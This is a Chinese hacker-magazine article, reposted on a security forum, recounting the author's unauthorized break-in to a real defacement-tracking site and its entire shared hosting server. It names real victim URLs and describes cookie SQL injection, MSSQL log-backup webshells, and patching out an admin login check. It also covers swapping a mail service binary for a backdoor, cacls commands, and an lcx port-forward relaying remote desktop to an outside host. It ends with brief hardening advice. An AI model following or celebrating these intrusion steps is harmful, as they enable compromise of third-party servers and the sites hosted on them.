首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

艰难入侵“中国被黑站点统计系统”


http://www.gipsky.com/
本文已发表在2008-9月的《黑客手册》杂志上,版权规杂志所有,网络首发http://0kee.com/,转载请注明。



前几天无事(其实一直都没啥鸟事),上网闲逛,进了一个站叫“中国被黑站点统计系统”,收录了5W多条黑页记录,看起来很强大的样子。突然心血来潮想检测一下这个站点的安全性,经过一番努力,最后终于拿下了这个站点和整个服务器,过程中学到不少东西,入侵水平也有了提高,记录下来与大家分享下。很多图是后来截的,可能跟原过程有有点小出入,不过总体上是一样的。

首先,这种网站本身一般是不大可能有注射点什么的,功能看起来也少得可怜,意思就是说,得旁注了,查一下,服务器上有50多个站



当然,现在的虚拟主机都知道限制权限了,就算拿到旁站shell,提权不是容易的事,我的目标主要是想找个有权限的mssql注射点,这样就可以往目标网站备份了。扫一下端口,只开了21和80,看来应该是有防火墙,php的站点必须跟mysql搭配的,要不就是站库分离,要是遇到那种就太衰了。



废话少说,随便点开一个http://fdc.macheng.net.cn/ShowNews.Asp?ID=3226,后面加个and 1=1,弹个框框出来:



参数错误



即将返回主页



Http://www.macheng.net.cn



根据我的经验,这种弹框框的多半是通用防注的形式,很多时候可以cookie注射的。cookie注射大家都会吧,这里我就不手动了,太麻烦,我用自己写的一个asp版的注射工具来搞。最终检测结果为access的数据库格式,又扫不到后台,放弃,下一个……

一番曲折后进入一个连接http://www.macheng.net.cn/ShowNews.Asp?ID=4190,and 1=1之,弹框框了,在后面随便加两个字母,报错了



Mssql的哦,我立刻来了精神,操起工具就开干。

确定可以cookie注射,最简单的方法,找到zoneh的目录直接往里备份php马。当然,这得看运气了。先列目录吧,根据经验,虚拟主机的目录至少有90%的可能性不在c盘下,那就从D盘开始列吧,现成的语句我就不写了,网上随处可查,结果如下:

啊哦,写文章的时候那个站的shell已经被发现了,sql改了权限,建不了表,也就列不了目录了。所以就没办法截图了,我凭记忆写吧

列出来D盘下有一个WebHost目录比较可疑,跟进去,最后跟到'D:\WebHost\AutoHost\wwwroot',等一等,不对吧,服务器上明明有50多个站的,看来这个目录是假的,列e盘,最后确定web根目录为e:\RuiHuoWeb\,里面有个目录叫zoneh的,ok,看来这就是目标了,列一下,呵呵,要是这样就让我列出来了这篇文章也就没有存在的价值了。空的,郁闷了,换其他站试试,列出来都是三个子目录:database、logfiles、wwwroot,看来wwwroot就是web路径,试着备份一下,提示成功,访问报No input file specified.什么意思?随便输一个不存在的名字sdsd.php,还是报这个。看来是404,备份失败。好吧,那就先拿个注射点的shell再说。猜了好多次才猜对目录,汗死了,最后终于备份成功了一个小马,传上大马,进去鸟~~



把shell拿给小帅看看,那小子进去就直接传个php,然后告诉我无法解析,我点开看看,报404,传个aspx的,也报404,作了什么特殊限制吧,后来发现删不掉了,汗~估计就是这两个文件被人家发现了。权限如我所料限得很死,除主目录外基本不能访问,serv-u等大众提权方式都不管用。(废话,要不这篇文章也没价值了)翻到sql帐号,连上sql列目录试试:



很奇怪,列其他目录正常,列zoneh的目录就出问题,报什么错误忘了,看来空间商对这个站单独作了设置,不愧是黑客站啊。只好把黑手伸向空间商的网站,看看拿到空间商的站权限会不会大点,说不定有个sa什么的在=我……嘿嘿,YY中……web路径里有个RuiHuoWeb,那这个空间商的网站应该跟RuiHuo有关,旁注查询返回的结果里找了半天,找到个www.ruihuo.net,点开果然是空间商的站点。正好web根下有个ruihuo目录,列一下,全是php文件,但是那个站明明就是asp的,看来不是这个目录。又找半天,没一个像的(汗~体力活啊)这时突然想起前面的那个'D:\WebHost\AutoHost\wwwroot',说不定空间商的网站就是那个,试着备份一个shell进去,果然……



拿下了空间商的站点,很遗憾,里面没有sa,竟然是access的库,权限跟其他站一样限得很死。看到一个admin目录,点开看看,原来是虚拟主机的控制后台,估计这个后台应该有点权限吧,于是把他的网站程序打包down下来。这时候已经很晚了,睡了,明天再来研究~~



第二天看了一下admin里面的文件,发现这个网站对服务器上的站点有很大的控制权限,于是登陆后台……可是md5破不开怎么办?都有webshell了还管什么密码,直接把验证的部分注释掉,这样就进后台了。



后台看起来很强大哦,还有注销和重启功能,不过iis用户怎么可能有权限重启呢?看了下,重启部分的代码是这么写的:

Returnvalue=reboot( Trim(request.form("webip")), Port, Guid, "reboot")

看来他们自己改写了vb里面的系统函数库啊,但是重启是需要权限的,一定有一个系统帐号用来完成这一操作,一般来说这样的信息会写在两个地方,注册表或者配置文件。如果是注册表的话,因为不知道注册表路径,所以是不能直接用asp读取的,只要服务器支持aspx,就可以用我自己写的注册表浏览器来浏览整个注册表了。因为根据我的经验,服务器一般都不大重视注册表安全的,everyone可以浏览除了sam外的绝大部分注册表路径。C:\windows目录能跳,里面有.net的目录,说明是装了.net的,只是没有在iis里面把aspx支持开启。在“主机管理”里找到第一次进去的网站,点进去,这不有改支持脚本类型的选项吗



直接把net和php加上,刷一下刚才的aspxshell,还是404,估计是要等到iis重启才生效吧,当然我们可以现在就直接重启系统,不过那样就不低调了,嘿嘿。再往下看,这不还有个改ftp密码的地方吗。于是找到zoneh的站,直接把它的ftp密码改了,然后连ftp,密码还是不对,看来改ftp密码也得等serv-u重启才生效(表问我为什么那么确定是serv-u)。等到晚上夜深人静,我终于重启了服务器,过几分钟后网页能打开了,于是连上ftp,成功登陆,OH~YEAH,看我怎么玩死你(相信我,不会这么容易成功的)ls一下,显示一片空格,一个文件都没有,怎么可能,试着传一个呢。报什么错误不记得了,反正就是无法写入之类的。我日,ftp都写不了,太BT了吧,难道它从来都不需要更新程序什么的?相当的郁闷,最有可能的是这个目录取消了system的权限。NND,安全措施果然是一般的BT啊,难道以前被人黑过?

想起前面增加了aspx和php的解析,去试试生效了不。一点开,还是404…………

至此,入侵陷入僵局,思路彻底断掉了,我无聊的在webshell里面跳、跳、跳……跳到一个转折性的目录:C:\Documents and Settings\All Users\「开始」菜单\程序 。发现里面有个WinWebMail Server。隐约记得网上有关于winwebmail提权的传说,说这个程序的目录必须是everyone可写的。虽然不大相信,也暂且试一回吧。把winwebmail的快捷方式down下来,找到安装路径为D:\Server\Mail\WinWebMail\easymail.exe。跳转D:\Server,木权限,D:\Server\Mail\,进来鸟,嘿嘿,至少是可以读的。最后转到D:\Server\Mail\WinWebMail,试着传个文件,终于rp爆发了……



原来网上的传说是真的!ok,打起精神,来替换服务吧……不好意思,很晚了,我要先睡觉了,明天继续……

今天继续。网上去down了个winwebmail,装上查看服务启动的进程为emsvr.exe。ok,先把服务器上的emsvr.exe改个名字,然后上传个后门取名为emsvr.exe。呵呵,幸好没被杀,我对免杀可是一窍不通。没耐心等到晚上了,直接重启,几分钟之后,服务器上线,那个激动啊,经历了这么多磨难,Finally……



Ok,有systemshell就好办事了。连上去执行cacls.exe E:\RuiHuoWeb\zoneh /E /T /G system:F,即把这个目录以及子目录和文件的所有权限赋予system,返回:

处理的目录: E:\RuiHuoWeb\zoneh

处理的目录: E:\RuiHuoWeb\zoneh\database

处理的目录: E:\RuiHuoWeb\zoneh\logfiles

处理的目录: E:\RuiHuoWeb\zoneh\wwwroot

处理的目录: E:\RuiHuoWeb\zoneh\logfiles\W3SVC71262931

处理的目录: E:\RuiHuoWeb\zoneh\logfiles\W3SVC71262932

处理的目录: E:\RuiHuoWeb\zoneh\logfiles\W3SVC83154450

处理的文件: E:\RuiHuoWeb\zoneh\logfiles\W3SVC71262931\ex080315.log

处理的文件: E:\RuiHuoWeb\zoneh\logfiles\W3SVC71262932\ex080315.log

拒绝访问。

嗯,看来是所有权的问题,牵扯到windows的安全机制,一时半会说不清楚(众人:装B了吧,不懂就直说嘛!)看来cacls这个命令还是有缺陷的,如果能在图形界面下修改权限就好了,可是ntshell是不带龟壳(众人:???我:图形用户界面,graphic user interface,简称gui,你读一下,不念“龟”念什么?后面再加个shell,合起来不就是“龟壳”?众人:。。。。。。。。。。。。。。。)的。我就不相信在system下会有做不到的事,逼我占领3389是吧。Webshell里查看,终端端口改成了9419,连了一下连不上,但是webshell里扫本地端口是开放的,看来还是防火墙作怪,木事,丢个lcx上去转发,嘿嘿,lcx转发大家比我用得熟吧?我还是第一次用哦。先建好帐号,本地输入lcx ?listen 8080 2000,服务器上输入lcx.exe -slave xxx.xxx.xxx.xxx 8080 xxx.xxx.xxx.xxx 9419。然后mstsc 127.0.0.1:2000,千辛万苦之下,终于占领3389了,呼…………



二话不说改权限:



Finally……有权限写了,传个phpspy上去



不用说也知道被涂黑的是我的shell吧?废了九牛二虎之力,终于成功取得目标网站以及服务器权限,截图留恋。



最后总结下,总的来说这个虚拟主机的安全性还是不错的,空间商也很有安全意识。唯一的两个漏洞在于mssql帐号可以往任意system可写的目录下备份webshell,和winwebmail目录可写。对于第二个问题,winwebmail目录可写应该是有它的理由的。如果无法从权限上来限制就最好给安装目录取复杂的名字,同时删除快捷方式并设置注册表相应键值的权限,以免被人找到。

而第一个问题应该是普遍存在的。现在的虚拟主机空间商都越来越知道限制权限了,一般目录的权限的设得很死,可是对于mssql的logbackup攻击方式没有还是引起足够的重视。这种攻击对sql帐号权限要求不高,db_owner足以,一个mssql的注射点就可能导致服务器上所有站点的沦陷。网上关于logbackup备份来旁注攻击的文章也有不少了,可是我遇到的很多mssql注射点都是可以直接往任意目录备份的,除了一个网站删了存储过程还是怎么地,列不了目录,不过后来用其他方法取得了web路径可以直接备份。希望各空间商引起重视。

Ok废话说完了,累死了,收工!
<< 揪出隐藏电脑中的入侵黑手 腾讯QQ爆重大漏洞 可查任意QQ号好友列表 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8